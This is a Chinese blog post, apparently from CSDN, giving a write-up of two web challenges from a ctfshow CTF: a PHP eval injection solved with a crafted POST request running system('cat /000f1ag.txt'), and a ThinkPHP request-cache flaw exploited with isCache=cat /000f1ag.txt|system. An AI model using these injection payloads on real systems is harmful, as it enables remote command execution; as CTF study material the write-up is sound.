西瓜杯CTF(1)

最新推荐文章于 2025-03-22 21:46:14 发布
最新推荐文章于 2025-03-22 21:46:14 发布
阅读量1k 收藏 4
点赞数 9
文章标签: 网络安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_63217130/article/details/140301611
版权
#下班之前写了两个题,后面继续发

Codeinject

<?php

#Author: h1xa

error_reporting(0);
show_source(__FILE__);

eval("var_dump((Object)$_POST[1]);");

payload 闭合后面的括号来拼接

POST / HTTP/1.1
Host: 1dc86f1a-cccc-4298-955d-e9179f026d54.challenge.ctf.show
Content-Type: application/x-www-form-urlencoded
Content-Length: 37

1="whoami");system('cat /000f1ag.txt'

tpdoor

#原来CTF还可以这样做

首先下载官方提供的部分源码

发现isCache是可控的参数 另外这是thinkphp的源码,要想获取flag根据有限的源码是没有看到什么漏洞可以配合参数进行利用的,那么这里的考点就是thinkphp的漏洞了,iscache是可控的,那么看看thinkphp的源码

全集搜索request_cache_key

在这个config参数中有request_cache_key

再看这里也有个request_cache_key

getRequestCache给key赋值了并且return 如同最终key传到了parseCacheKey中

看看这个函数如下 将$key以 | 分隔开 | 后面的所有fun key作为参数值 构造payload:whoami|system

读取flag的payload:isCache=cat%20/000f1ag.txt|system

Ting丶丶
关注
[CTFshow]吃瓜复现wp
Huamang的博客
08-19 1127
热身 <?php include("flag.php"); highlight_file(__FILE__); if(isset($_GET['num'])){ $num = $_GET['num']; if($num==4476){ die("no no no!"); } if(preg_match("/[a-z]|\./i", $num)){ die("no no no!!"); } if(!strpos($num,
BUUCTF二维码1
weixin_34979095的博客
08-29 801
我勉为其难讲一下PS怎么拼图,首先要把九张碎片抠图,背景变透明,ps可以但是太麻烦,我在GIthub找到一个Python+Qt写的自动抠图的软件,使用removebg提供的api接口,可生成高清图预览并保存,输入图片链接也可在线抠图。超赞,起码比某些国产类似软件有良心,长期用收费还要充米不停买流量豆。九张撕碎二维码碎片。看了大神们得博客竟然是真的,这是ctf的题吗!下载解压在主目录dist\index下有个index.exe,双击。但是不知道为啥我的扫不出flag,头疼借用一下大神的图片。
2024_ctfshow_西瓜复现
2301_80185313的博客
08-02 4534
ctfshow西瓜wp
ctfshow西瓜
最新发布
2201_75782783的博客
03-22 871
这道题打开是个图片,常规扔到010:发现里面有flag.txt,然后根据搜索这是一个图片隐写,有很多种方法,总结如下;文件分离3、文件分离。
ctfshow 西瓜 Reverse pe
m0_73749989的博客
10-22 222
老规矩,查壳无壳,因为提示是修改pe头,所以就把文件丢010Editor里面了。纯属好奇有一段ASCII码那么空,就拉下去看了一眼,然后就找到了。
【Web】XGCTF 西瓜 超详细题解
uuzeray的博客
09-10 3785
var_export() 确保 $config 数组可以被转换为合法的 PHP 代码并存储到文件中,以便下次项目运行时这些新的配置可以被加载和应用。它的主要功能是在用户请求时检查是否有可用的缓存,如果缓存可用则直接返回缓存内容,从而避免重新处理请求,提升性能。substrstr($data) 的作用是从输入的字符串 $data 中,提取第一个方括号 [ 和 ] 之间的内容。同时我们逃逸出的字符不能大于原来的字符数量,所以我们可以传参start来调整原字符的数量,以此逃逸出预期的字符。
CTFSHOW XGCTF write-up
qq_63923205的博客
07-08 2307
XGCTF WP
ctfshow 吃瓜八月赛 Misc WriteUp
Nancy523的博客
08-18 1259
目录 1、Misc游戏签到 2、吃瓜 3、EZbingo 4、魔王 5、Dinner of Cyanogen 6、Music Game 7、一群强盗 目录位置) 1、Misc游戏签到 别问 问就是玩游戏 套神说的) :多选杀戮 没有杀戮就选背刺 少选能量瓶子 吓死就对了^q^ 打了小几十把 脸黑没办法 期间遇到过环境卡死 3段flag闪退 环境罢工( 八神说 是python的错跟套神没关系呜呜呜 ctfshow{White_give_game_o...
ctfshow吃瓜 misc writeup
ashMOB的博客
11-15 1039
ctfshow吃瓜 misc writeup 基本还是看着大佬wp去复现 ctfshow吃瓜 八月群赛 WriteUp/WP_是Mumuzi的博客-CSDN博客 Misc游戏签到 游戏题,比较看脸,因为遇到太多次靶场死机所以直接抄flag上去了 She Never Owns a Window 下载下来打开发现是一个文本文件,但是有许多空白换行和tab 提示说不是SNOW(Steganography -SNOW- AVariation:这是一种创新的 隐写 技术,可用于隐藏两个单词之间的空格后面的文本数据
ctfshow吃瓜web wp
cosmoslin的博客
09-17 1333
热身 <?php include("flag.php"); highlight_file(__FILE__); if(isset($_GET['num'])){ $num = $_GET['num']; if($num==4476){ die("no no no!"); } if(preg_match("/[a-z]|\./i", $num)){ die("no no no!!");
(XGCTF西瓜pwn部分wp
susu_xiaosu的博客
07-23 815
【代码】(XGCTF西瓜pwn部分wp。
ctfshow吃瓜之web(除魔女)详解
qq_50589021的博客
09-06 1171
shellme 搜索ctfshow即可 热身 <?php include("flag.php"); highlight_file(__FILE__); if(isset($_GET['num'])){ $num = $_GET['num']; if($num==4476){ //参数等于4476不行 die("no no no!"); } if(preg_match("/[a-z]|\./i", $num)){ //匹配到小写字母和.不行
ctfshow吃瓜 八月群赛 WriteUp/WP
mumuzi的博客
08-16 3024
可以 Web: shellme 题目问题,没什么说的,进去直接搜ctfshow就是flag 热身 签到题,做过web入门的都应该知道怎么绕,分开来看 比如第一个部分可以用小数绕过,第二部分没有字母,可以用8进制绕过。 所以目前得到的payload是 num=010574 但是第三部分还要看0是不是出现在首位,这里就可以用+号,来凑个数 最终payload num=+010574 PWN wuqian 只会最简单的,别骂了 就一个栈溢出,找到rdi、system、/bin/sh的地址就行了 from
24西瓜-misc1复现
WTT001的博客
07-24 531
出来一个flag的txt文本,看的出来是文本隐写 一开始想的是零宽度字符隐写,但后来发现是snow隐写 提示:图片上的汉字是某个key 所以。之后就不知道了 然后看了wp 我有想到是oursecret隐写,但是这密码藏得太有脑洞了吧 首先我们要去010把PK文件全部去掉。去010看到有压缩包,分离出来。oursecret才可以识别到。密钥藏在文件创建时间上面。用官方的脚本复现一下吧。
CTF之路:关于PHP eval() 注入问题
zw05011的博客
01-03 5519
CTF之路:关于PHP eval() 注入问题
调用短信接口,先var_dump()看数据类型是object需要json_decode(json_encode( $resp),true)转换成array...
weixin_30652491的博客
05-10 359
返回的数据.先看类型,如果是object类型 先json_encode, 再json_decode,加true 转换成数组 $resp = $c->execute($req); var_dump($resp); object(stdClass)#12 (2) { ["result"]=> object(stdClass)#13 (3) { ["err_code"]=...
php输出属性var_dump,phpvar_dump遍历对象属性的代码应用
weixin_30686891的博客
03-10 513
var_dump此函数显示关于一个或多个表达式的结构信息,包括表达式的类型与值。数组将递归展开值,通过缩进显示其结构。本文章下面我们要为你提供二种关于遍历对象属性方法,并且举例说明遍历对象属性在php中的应用。可以看出私有变量与静态变量时获取不到的,只有定义为公共变量才可以读出来。遍历对象属性第一种方法:代码如下:...
js操作json总结
KylinBL的专栏
02-23 3745
<br />   一直在用写javascript的东西,却没怎么去关注json。以前需要把后台php的数据传到js中去使用,总是先把数据弄成一长的字符串,然后前台在用split去拆成数组格式,这样转换来转换去,久了就烦了,而且有时候也容易有忘掉去转换的情况,这样数组过去就乱掉了。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值